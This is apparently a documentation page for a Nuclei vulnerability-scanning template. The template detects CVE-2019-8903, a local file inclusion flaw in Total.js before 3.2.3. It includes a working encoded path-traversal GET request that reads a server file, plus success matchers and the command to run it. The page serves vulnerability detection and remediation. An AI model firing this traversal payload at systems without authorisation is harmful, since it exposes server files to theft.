Skip to content

Totaljs <3.2.3 - Local File Inclusion

ID: CVE-2019-8903

Severity: high

Author: madrobot

Tags: cve2019,cve,totaljs,lfi,node.js

Total.js Platform before 3.2.3 is vulnerable to local file inclusion.

id: CVE-2019-8903
info:
name: Totaljs <3.2.3 - Local File Inclusion
author: madrobot
severity: high
description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
impact: |
An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
remediation: |
Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
reference:
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
- https://nvd.nist.gov/vuln/detail/CVE-2019-8903
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8903
cwe-id: CWE-22
epss-score: 0.01284
epss-percentile: 0.85758
cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: totaljs
product: total.js
framework: node.js
tags: cve2019,cve,totaljs,lfi,node.js
http:
- method: GET
path:
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "apache2.conf"
- type: status
status:
- 200
# digest: 4a0a0047304502205b633425be9e46e41577db6fcbdf2bfa51bb31bba41badb684a14079cbad05b8022100f83e1b7681d70f5c1df63046ad92afb7fd054c1ed837f19a4e1d95b8e0321bdd:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8903.yaml"

View on Github